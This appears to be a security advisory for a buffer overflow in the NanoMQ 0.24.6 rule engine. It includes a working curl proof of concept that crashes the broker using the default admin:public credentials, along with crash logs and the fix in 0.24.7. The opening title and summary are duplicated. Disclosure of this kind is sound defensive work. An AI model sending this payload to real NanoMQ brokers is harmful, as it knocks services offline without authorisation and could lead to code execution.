NanoMQ 0.24.6 Remote Buffer Overflow

NanoMQ Rules Engine Remote Buffer Overflow

=======
Summary
=======

A NanoMQ 0.24.6 Remote Buffer Overflow

NanoMQ Rules Engine Remote Buffer Overflow

=======
Summary
=======

A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a Denial of Service (DoS) and potentially achieve Remote Code Execution (RCE). The vulnerability requires admin privileges, but use of default credentials (admin:public) may be common, lowering the barrier to access and increasing the practical impact.

Target: NanoMQ (emqx/nanomq:latest-full image tested)
Version Affected: ? 0.24.6

============
How It Works
============

The vulnerability is located in the Rule Engine's SQLite integration. When a user creates a rule with a SQLite action, NanoMQ dynamically constructs a CREATE TABLE SQL statement. The flaw stems from the unsafe use of the string copy functions.

For the vulnerability to be exploitable, two conditions must be met:

1. HTTP Server Must Be Enabled: The NanoMQ HTTP server must be active to expose the /api/v4/rules endpoint.

2. Rule Engine Must Be Compiled: The NanoMQ binary must be compiled with the Rule Engine feature enabled (-DENABLE_RULE_ENGINE=ON). This is not the default for release binaries.

However, note that the popular emqx/nanomq:latest-full Docker image, which has over 100,000 downloads, comes with the rule engine enabled by default, making it vulnerable if HTTP server is enabled.

=======
Testing
=======

Triggering the buffer overflow requires sending a POST request to the /api/v4/rules endpoint. The request must contain a JSON payload with a long alias in the rawsql field.

===========
Environment
===========

docker run -d --name nanomq-test -p 8081:8081 -e NANOMQ_HTTP_SERVER_ENABLE=true emqx/nanomq:latest-full

===
PoC
===

curl -u admin:public -X POST http://localhost:8081/api/v4/rules -H "Content-Type: application/json" -d "{\"rawsql\": \"SELECT qos as $(perl -e 'print \"A\" x 180' ) FROM \\\"test/topic\\\"\", \"actions\": [{\"name\": \"sqlite\", \"params\": {\"table\": \"table\"}}]}"

After sending the request, the NanoMQ instance will crash, and the logs will show buffer overflow detection.

====
Logs
====

*** buffer overflow detected ***: terminated
WARN /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:1288 broker: NanoMQ (ver 0.24.6) Serving HTTP Server on http://(null):8081
NanoMQ Broker is started successfully!
ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: near "table": syntax error

ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: (null)

ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
ERROR /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:114 sig_handler: signal signumber: 6 received!

======
Impact
======

This vulnerability may lead to:

- Denial of Service (DoS): A remote attacker can crash the NanoMQ broker with a single request.
- Remote Code Execution (RCE): A sophisticated attacker could potentially craft a payload to exploit the buffer overflow and execute arbitrary code.

==========
Mitigation
==========

The vulnerability was addressed in NanoMQ version 0.24.7 by replacing an unsafe strcpy() function with snprintf(). This ensures that all string operations are bounds-checked, preventing the buffer overflow.

The fix was introduced in this commit:
- https://github.com/nanomq/nanomq/commit/f6f5d1d2c01cbd56212924a1dfb59152ac63cc81

Users can upgrade to NanoMQ version 0.24.7 or later to mitigate this vulnerability.

Other mitigations could include ensuring the HTTP server or Rules Engine is disabled.

Jeremy Brown (jbrown3264/gmail), Jan 2026